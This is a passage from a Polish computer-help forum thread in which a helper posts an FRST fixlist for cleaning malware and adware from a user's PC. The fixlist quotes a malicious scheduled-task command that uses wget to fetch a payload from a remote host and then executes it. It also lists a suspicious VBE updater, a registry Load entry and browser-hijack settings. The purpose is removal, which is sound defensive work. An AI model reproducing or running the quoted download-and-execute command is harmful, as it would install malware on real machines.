Elektroda.pl

Troublesome javaws.exe - request to check logs.

resoto 14 Sep 2016 19:51 423 1
  • #2 15 Sep 2016 07:33
    krzychupar
    Level 40  

    Open the system Notepad and paste:
    Task: {4972E24F-94AA-44B9-863D-11A4B8E3C10D} - System32\Tasks\SYSTEM => /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://blockchainin.in/dat.bmp?data=yHXMwObQv9I3uyYpTIFK;Minecraft;1462184525 & start cmd /R dat.bmp <==== UWAGA
    Task: {914D83CE-CB22-4485-84BA-D24FD462B5DF} - System32\Tasks\Origin => C:\Users\Kamil\AppData\Roaming\Origin\update.vbe [2015-04-02] () <==== UWAGA
    Task: {91636D77-D61E-4476-A73D-9CF33EA7BC5D} - System32\Tasks\{EEE3A717-0A37-4675-B09B-9368A9D65E2B} => pcalua.exe -a "C:\Games\The Sims 4\__Installer\vp6\vp6install.exe" -d "C:\Games\The Sims 4\__Installer\vp6"
    HKU\S-1-5-21-1708202100-893893852-4168873351-1000\...\CurrentVersion\Windows: [Load] C:\Users\Kamil\LOCALS~1\Temp\msztot.cmd <===== UWAGA
    HKU\S-1-5-21-1708202100-893893852-4168873351-1000\...\MountPoints2: D - D:\autorun.exe
    HKU\S-1-5-21-1708202100-893893852-4168873351-1000\...\MountPoints2: F - F:\setup.exe
    ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX64.dll Brak pliku
    ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX64.dll Brak pliku
    ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX64.dll Brak pliku
    ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => Brak pliku
    ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => Brak pliku
    ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => Brak pliku
    ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX32.dll Brak pliku
    ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX32.dll Brak pliku
    ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX32.dll Brak pliku
    StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=144...p;uid=ST1000DM003-1CH162_Z1DB9H9CXXXXZ1DB9H9C




    FF NewTab: hxxp://www.istartsurf.com/newtab/?type=nt&...p;uid=ST1000DM003-1CH162_Z1DB9H9CXXXXZ1DB9H9C
    FF DefaultSearchEngine: luckysearches
    FF Homepage: hxxp://www.istartsurf.com/?type=hp&ts=144...p;uid=ST1000DM003-1CH162_Z1DB9H9CXXXXZ1DB9H9C
    FF Plugin: @esn/npbattlelog,version=2.5.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.0\npbattlelogx64.dll [Brak pliku]
    FF Plugin-x32: @esn/npbattlelog,version=2.5.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.0\npbattlelog.dll [Brak pliku]
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [Brak pliku]
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office15\NPSPWRAP.DLL [Brak pliku]
    CHR Extension: (SalePLuus) - C:\ProgramData\lcpigbgkkfkbcgihfoljdnhfmiheohib\ []
    S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
    S3 MBfilt; system32\drivers\MBfilt64.sys [X]
    S3 MSICDSetup; \??\D:\CDriver64.sys [X]
    S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [X]
    2016-09-14 19:03 - 2016-09-14 19:08 - 00000000 ____D C:\AdwCleaner
    2015-04-15 15:32 - 2015-04-15 17:11 - 0000020 _____ () C:\Users\Kamil\AppData\Roaming\appdataFr3.bin
    2015-03-26 21:14 - 2015-03-26 21:14 - 0004185 _____ () C:\Users\Kamil\AppData\Roaming\CIJTZJ
    2015-03-26 21:14 - 2015-04-05 12:13 - 0000385 _____ () C:\Users\Kamil\AppData\Roaming\IYXBM
    2015-02-15 14:56 - 2015-04-30 18:52 - 0000937 _____ () C:\Users\Kamil\AppData\Roaming\Sample.lnk
    2014-10-20 21:13 - 2014-10-20 21:13 - 0003584 _____ () C:\Users\Kamil\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2016-09-11 15:54 - 2016-09-11 15:54 - 0000218 _____ () C:\Users\Kamil\AppData\Local\recently-used.xbel
    2016-07-20 22:40 - 2016-09-14 19:29 - 0007650 _____ () C:\Users\Kamil\AppData\Local\Resmon.ResmonCfg
    2016-04-18 13:33 - 2016-09-14 17:50 - 0000000 _____ () C:\ProgramData\dat.bmp
    2014-07-16 07:17 - 2014-07-16 07:17 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
    2016-04-17 16:22 - 2016-05-02 12:21 - 0332800 _____ () C:\ProgramData\wget.exe
    C:\ProgramData\wget.exe
    C:\Users\Kamil\AppData\Roaming\Origin\update.vbe
    EmptyTemp:

    Save the file as fixlist.txt and place it next to FRST in the same folder.
    Run FRST and click Fix/Napraw.

    0